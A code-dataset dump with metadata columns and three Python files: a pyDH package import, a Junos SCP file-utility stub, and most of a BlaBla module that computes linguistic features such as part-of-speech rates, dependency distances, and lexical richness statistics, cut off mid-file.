hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ed68bd1d8d450093d1f9de39e63d07c64d8b318e
| 32
|
py
|
Python
|
pyDHFixed/__init__.py
|
pmichalak-l4a/pyDH
|
6926e240daab294fc8c72110df5fe4ae16652eb4
|
[
"Apache-2.0"
] | 30
|
2017-03-29T14:02:26.000Z
|
2021-12-31T17:36:17.000Z
|
pyDHFixed/__init__.py
|
pmichalak-l4a/pyDH
|
6926e240daab294fc8c72110df5fe4ae16652eb4
|
[
"Apache-2.0"
] | 20
|
2021-05-03T18:02:23.000Z
|
2022-03-12T12:01:04.000Z
|
Lib/site-packages/pyDH/__init__.py
|
fochoao/cpython
|
3dc84b260e5bced65ebc2c45c40c8fa65f9b5aa9
|
[
"bzip2-1.0.6",
"0BSD"
] | 14
|
2017-10-25T07:06:12.000Z
|
2021-11-01T17:38:54.000Z
|
from .pyDH import DiffieHellman
| 16
| 31
| 0.84375
| 4
| 32
| 6.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 32
| 1
| 32
| 32
| 0.964286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ed75289ff4e6874e3e61a06e2f69dca5cddc43ae
| 156
|
py
|
Python
|
pkgs/filetransferutils-pkg/src/genie/libs/filetransferutils/plugins/junos/scp/fileutils.py
|
jbronikowski/genielibs
|
200a34e5fe4838a27b5a80d5973651b2e34ccafb
|
[
"Apache-2.0"
] | 94
|
2018-04-30T20:29:15.000Z
|
2022-03-29T13:40:31.000Z
|
pkgs/filetransferutils-pkg/src/genie/libs/filetransferutils/plugins/junos/scp/fileutils.py
|
jbronikowski/genielibs
|
200a34e5fe4838a27b5a80d5973651b2e34ccafb
|
[
"Apache-2.0"
] | 67
|
2018-12-06T21:08:09.000Z
|
2022-03-29T18:00:46.000Z
|
pkgs/filetransferutils-pkg/src/genie/libs/filetransferutils/plugins/junos/scp/fileutils.py
|
jbronikowski/genielibs
|
200a34e5fe4838a27b5a80d5973651b2e34ccafb
|
[
"Apache-2.0"
] | 49
|
2018-06-29T18:59:03.000Z
|
2022-03-10T02:07:59.000Z
|
""" File utils base class for SCP on JunOS devices. """
from ..fileutils import FileUtils as FileUtilsJunOSBase
class FileUtils(FileUtilsJunOSBase):
pass
| 26
| 55
| 0.782051
| 19
| 156
| 6.421053
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141026
| 156
| 6
| 56
| 26
| 0.910448
| 0.301282
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
ed8be47d4b301f7d9de447873fd3b76e4a4e7444
| 30,618
|
py
|
Python
|
features/text_features/helpers/blabla/blabla/sentence_aggregators/lexico_semantic_fearture_aggregator.py
|
jim-schwoebel/allie
|
d85db041b91c81dfb3fd1a4d719b5aaaf3b6697e
|
[
"Apache-2.0"
] | 87
|
2020-08-07T09:05:11.000Z
|
2022-01-24T00:48:22.000Z
|
features/text_features/helpers/blabla/blabla/sentence_aggregators/lexico_semantic_fearture_aggregator.py
|
jim-schwoebel/allie
|
d85db041b91c81dfb3fd1a4d719b5aaaf3b6697e
|
[
"Apache-2.0"
] | 87
|
2020-08-07T19:12:10.000Z
|
2022-02-08T14:46:34.000Z
|
features/text_features/helpers/blabla/blabla/sentence_aggregators/lexico_semantic_fearture_aggregator.py
|
jim-schwoebel/allie
|
d85db041b91c81dfb3fd1a4d719b5aaaf3b6697e
|
[
"Apache-2.0"
] | 25
|
2020-08-07T20:03:08.000Z
|
2022-03-16T07:33:25.000Z
|
from blabla.sentence_processor.lexico_semantic_feature_engine import num_demonstratives
from blabla.utils.global_params import *
from collections import Counter
import numpy as np
import math
import blabla.utils.settings as settings
from blabla.utils.global_params import *
class Adjective_Rate(object):
"""Class to calculate the adjective rate
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the adjective rate
Args:
None
Returns:
The total number of adjectives to the total number of words
"""
tot_num_adjs, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_adjs += so.pos_tag_counter.get_pos_tag_count(ADJECTIVE)
tot_num_words += so.num_words()
return tot_num_adjs / tot_num_words
class Adposition_Rate(object):
"""Class to calculate the adposition rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the noun rate
Args:
None
Returns:
The total number of nouns to the total number of words
"""
tot_num_nouns, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(ADPOSITION)
tot_num_words += so.num_words()
return tot_num_nouns / tot_num_words
class Adverb_Rate(object):
"""Class to calculate the adverb rate
Ref: https://www.cs.toronto.edu/~kfraser/Fraser15-JAD.pdf
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the adverb rate
Args:
None
Returns:
The total number of adverbs to the total number of words
"""
tot_num_advs, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_advs += so.pos_tag_counter.get_pos_tag_count(ADVERB)
tot_num_words += so.num_words()
return tot_num_advs / tot_num_words
class Auxiliary_Rate(object):
"""Class to calculate the auxiliary rate
Ref: https://www.cs.toronto.edu/~kfraser/Fraser15-JAD.pdf
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the adverb rate
Args:
None
Returns:
The total number of adverbs to the total number of words
"""
tot_num_advs, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_advs += so.pos_tag_counter.get_pos_tag_count(AUXILIARY)
tot_num_words += so.num_words()
return tot_num_advs / tot_num_words
class Conjunction_Rate(object):
"""Class to calculate the conjunctions rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the conjunctions rate
Args:
None
Returns:
The total number of conjunctions to the total number of words
"""
tot_num_cconj, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(CONJUNCTION)
tot_num_words += so.num_words()
return tot_num_cconj / tot_num_words
class Determiner_Rate(object):
"""Class to calculate the determiner rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the conjunctions rate
Args:
None
Returns:
The total number of conjunctions to the total number of words
"""
tot_num_cconj, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(DETERMINER)
tot_num_words += so.num_words()
return tot_num_cconj / tot_num_words
class Interjection_Rate(object):
"""Class to calculate the interjection rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the conjunctions rate
Args:
None
Returns:
The total number of conjunctions to the total number of words
"""
tot_num_cconj, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(INTERJECTION)
tot_num_words += so.num_words()
return tot_num_cconj / tot_num_words
class Noun_Rate(object):
"""Class to calculate the noun rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the noun rate
Args:
None
Returns:
The total number of nouns to the total number of words
"""
tot_num_nouns, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
tot_num_words += so.num_words()
return tot_num_nouns / tot_num_words
class Numeral_Rate(object):
"""Class to calculate the numeral rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the conjunctions rate
Args:
None
Returns:
The total number of conjunctions to the total number of words
"""
tot_num_cconj, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(NUMERAL)
tot_num_words += so.num_words()
return tot_num_cconj / tot_num_words
class Particle_Rate(object):
"""Class to calculate the particle rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the conjunctions rate
Args:
None
Returns:
The total number of conjunctions to the total number of words
"""
tot_num_cconj, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(PARTICLE)
tot_num_words += so.num_words()
return tot_num_cconj / tot_num_words
class Pronoun_Rate(object):
"""Class to calculate the pronoun rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the pronoun rate
Args:
None
Returns:
The total number of pronouns to the total number of words
"""
tot_num_pron, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PRONOUN)
tot_num_words += so.num_words()
return tot_num_pron / tot_num_words
class Proper_Noun_Rate(object):
"""Class to calculate the proper noun rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the pronoun rate
Args:
None
Returns:
The total number of pronouns to the total number of words
"""
tot_num_pron, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PROPER_NOUN)
tot_num_words += so.num_words()
return tot_num_pron / tot_num_words
class Punctuation_Rate(object):
"""Class to calculate the punctuation rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the pronoun rate
Args:
None
Returns:
The total number of pronouns to the total number of words
"""
tot_num_pron, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PUNCTUATION)
tot_num_words += so.num_words()
return tot_num_pron / tot_num_words
class Subordinating_Conjunction_Rate(object):
"""Class to calculate the subordinating conjuction rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the pronoun rate
Args:
None
Returns:
The total number of pronouns to the total number of words
"""
tot_num_pron, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(SUBORDINATING_CONJUNCTION)
tot_num_words += so.num_words()
return tot_num_pron / tot_num_words
class Symbol_Rate(object):
"""Class to calculate the symbol rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the pronoun rate
Args:
None
Returns:
The total number of pronouns to the total number of words
"""
tot_num_pron, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(SYMBOL)
tot_num_words += so.num_words()
return tot_num_pron / tot_num_words
class Verb_Rate(object):
"""Class to calculate the verb rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the verb rate
Args:
None
Returns:
The total number of verbs to the total number of words
"""
tot_num_verbs, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
tot_num_words += so.num_words()
return tot_num_verbs / tot_num_words
class Demonstrative_Rate(object):
"""Class to calculate the demonstratives rate
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the verb rate
Args:
None
Returns:
The total number of demonstratives to the total number of words
"""
tot_num_demons, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_demons += num_demonstratives(so.stanza_doc)
tot_num_words += so.num_words()
return tot_num_demons / tot_num_words
class Possessive_Rate(object):
"""Class to calculate the possessive rate
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3642700/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the possessive rate
Args:
None
Returns:
The total number of adjectives and pronouns to the total number of words
"""
tot_num_adjs, tot_num_pron, tot_num_words = 0, 0, 0
for so in self.sentence_objs:
tot_num_adjs += so.pos_tag_counter.get_pos_tag_count(ADJECTIVE)
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PRONOUN)
tot_num_words += so.num_words()
return (tot_num_adjs + tot_num_pron) / tot_num_words
class Noun_Verb_Ratio(object):
"""Class to calculate the ratio of the number of nouns to the number of verbs
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the noun to verb
Args:
None
Returns:
The total number of nouns to the number of verbs
"""
tot_num_nouns, tot_num_verbs = 0, 0
for so in self.sentence_objs:
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
if tot_num_verbs != 0:
return tot_num_nouns / tot_num_verbs
return NOT_AVAILABLE
class Noun_Ratio(object):
"""Class to calculate the ratio of the number of nouns to the total number of nouns and verbs
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the noun ratio
Args:
None
Returns:
The total number of nouns to the total number of nouns and verbs
"""
tot_num_nouns, tot_num_verbs = 0, 0
for so in self.sentence_objs:
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
if (tot_num_nouns + tot_num_verbs) != 0:
return tot_num_nouns / (tot_num_nouns + tot_num_verbs)
class Pronoun_Noun_Ratio(object):
"""Class to calculate the ratio of the number of pronouns to the total number of nouns
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the pronoun to noun ratio
Args:
None
Returns:
The ratio of the total number of pronouns to the number of nouns
"""
tot_num_prons, tot_num_nouns = 0, 0
for so in self.sentence_objs:
tot_num_prons += so.pos_tag_counter.get_pos_tag_count(PRONOUN)
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
if tot_num_nouns != 0:
return tot_num_prons / tot_num_nouns
return NOT_AVAILABLE
class Total_Dependency_Distance(object):
"""Class to calculate the sum of dependency distances
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total dependency distance across all sentences
Args:
None
Returns:
the sum of dependency distances
"""
tot_dist = 0
for so in self.sentence_objs:
sd = so.stanza_doc.to_dict()[0]
tot_dist += np.sum([abs(int(dep['id']) - dep['head']) for dep in sd])
return tot_dist
class Average_Dependency_Distance(object):
"""Class to calculate the sum of dependency distances
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total dependency distance across all sentences
Args:
None
Returns:
the sum of dependency distances
"""
tot_dist = []
for so in self.sentence_objs:
sd = so.stanza_doc.to_dict()[0]
tot_dist.append(sum([abs(int(dep['id']) - dep['head']) for dep in sd]))
if tot_dist:
return np.mean(tot_dist)
return NOT_AVAILABLE
class Total_Dependencies(object):
"""Class to calculate the number of unique syntactic dependencies
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total number of unique dependencies across sentences
Args:
None
Returns:
the total number of unique dependencies
"""
deprels = []
for so in self.sentence_objs:
sd = so.stanza_doc.to_dict()[0]
deprels.extend([dep['deprel'] for dep in sd])
return len(set(deprels))
class Average_Dependencies(object):
"""Class to calculate the average number of unique syntactic dependencies
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the average number of unique dependencies across sentences
Args:
None
Returns:
the average number of unique dependencies
"""
num_deprels = []
for so in self.sentence_objs:
sd = so.stanza_doc.to_dict()[0]
deprels = set([dep['deprel'] for dep in sd])
num_deprels.append(len(deprels))
if num_deprels:
return np.mean(num_deprels)
return NOT_AVAILABLE
class Closed_Class_Word_Rate(object):
"""Class to calculate the proportion of closed class words
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the proportion of close class words
Args:
None
Returns:
The ratio of the total number of determiners, prepositions, pronouns and conjunctions to the total number of words
"""
tot_num_det, tot_num_prep, tot_num_pron, tot_num_cconj, tot_num_words = (
0,
0,
0,
0,
0,
)
for so in self.sentence_objs:
tot_num_det += so.pos_tag_counter.get_pos_tag_count(DETERMINER)
tot_num_prep += so.pos_tag_counter.get_pos_tag_count(ADPOSITION)
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PRONOUN)
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(CONJUNCTION)
tot_num_words += so.num_words()
return (
tot_num_det + tot_num_prep + tot_num_pron + tot_num_cconj
) / tot_num_words
class Open_Class_Word_Rate(object):
"""Class to calculate the proportion of open class word_count
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the proportion of open class words
Args:
None
Returns:
The ratio of the total number of nouns, verbs, adjectives and adverbs to the total number of words
"""
tot_num_nouns, tot_num_verbs, tot_num_adjs, tot_num_advs, tot_num_words = (
0,
0,
0,
0,
0,
)
for so in self.sentence_objs:
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
tot_num_adjs += so.pos_tag_counter.get_pos_tag_count(ADJECTIVE)
tot_num_advs += so.pos_tag_counter.get_pos_tag_count(ADVERB)
tot_num_words += so.num_words()
return (
tot_num_nouns + tot_num_verbs + tot_num_adjs + tot_num_advs
) / tot_num_words
class Content_Density(object):
"""Class to calculate the content density of words
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the content density of words
Args:
None
Returns:
The ratio of the total number of open class words to the total number of closed class words
"""
tot_num_nouns, tot_num_verbs, tot_num_adjs, tot_num_advs = 0, 0, 0, 0
tot_num_det, tot_num_prep, tot_num_pron, tot_num_cconj = 0, 0, 0, 0
for so in self.sentence_objs:
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
tot_num_adjs += so.pos_tag_counter.get_pos_tag_count(ADJECTIVE)
tot_num_advs += so.pos_tag_counter.get_pos_tag_count(ADVERB)
for so in self.sentence_objs:
tot_num_det += so.pos_tag_counter.get_pos_tag_count(DETERMINER)
tot_num_prep += so.pos_tag_counter.get_pos_tag_count(ADPOSITION)
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PRONOUN)
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(CONJUNCTION)
numerator = tot_num_nouns + tot_num_verbs + tot_num_adjs + tot_num_advs
denominator = tot_num_det + tot_num_prep + tot_num_pron + tot_num_cconj
if denominator == 0:
return NOT_AVAILABLE
return numerator / denominator
class Idea_Density(object):
"""Class to calculate the idea density of words
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the idea density of words
Args:
None
Returns:
The ratio of the total number of verbs, adjectives, adverbs, prepositions, conjunctions to the number of words
"""
(
tot_num_verbs,
tot_num_adjs,
tot_num_advs,
tot_num_preps,
tot_num_cconjs,
tot_num_words,
) = (
0,
0,
0,
0,
0,
0,
)
for so in self.sentence_objs:
tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
tot_num_adjs += so.pos_tag_counter.get_pos_tag_count(ADJECTIVE)
tot_num_advs += so.pos_tag_counter.get_pos_tag_count(ADVERB)
tot_num_preps += so.pos_tag_counter.get_pos_tag_count(ADPOSITION)
tot_num_cconjs += so.pos_tag_counter.get_pos_tag_count(CONJUNCTION)
tot_num_words += so.num_words()
return (
tot_num_verbs + tot_num_adjs + tot_num_advs + tot_num_preps + tot_num_cconjs
) / tot_num_words
class Honore_Statistic(object):
"""Class to calculate the honore's statistic
Ref: https://www.aclweb.org/anthology/W16-1902.pdf
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the honore's statistic
Args:
None
Returns:
The honore's statistic of the words
"""
all_words = []
num_unique_words_spoken, num_words_spoken_only_once = 0, 0
for so in self.sentence_objs:
all_words.extend([word.text for word in so.stanza_doc.sentences[0].words])
num_unique_words_spoken = len(set(all_words))
word_counts = dict(Counter(all_words))
for key, val in word_counts.items():
if val == 1:
num_words_spoken_only_once += 1
num_words = len(all_words)
if (num_words_spoken_only_once == num_unique_words_spoken) or (num_unique_words_spoken == 0) or (num_words == 0):
return NOT_AVAILABLE
honore_statistic = (100 * math.log(num_words)) / (
1 - (num_words_spoken_only_once) / (num_unique_words_spoken)
)
return honore_statistic
class Brunet_Index(object):
"""Class to calculate the brunet's statistic
Ref: https://www.aclweb.org/anthology/W16-1902.pdf
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the brunet's statistic
Args:
None
Returns:
The brunet's statistic of the words
"""
num_unique_words_spoken = 0
all_words = []
for so in self.sentence_objs:
all_words.extend([word.text for word in so.stanza_doc.sentences[0].words])
num_unique_words_spoken = len(set(all_words))
num_words = len(all_words)
brunet_index = math.pow(num_words, math.pow(num_unique_words_spoken, -0.165))
return brunet_index
class Type_Token_Ratio(object):
"""Class to calculate the type-token ratio
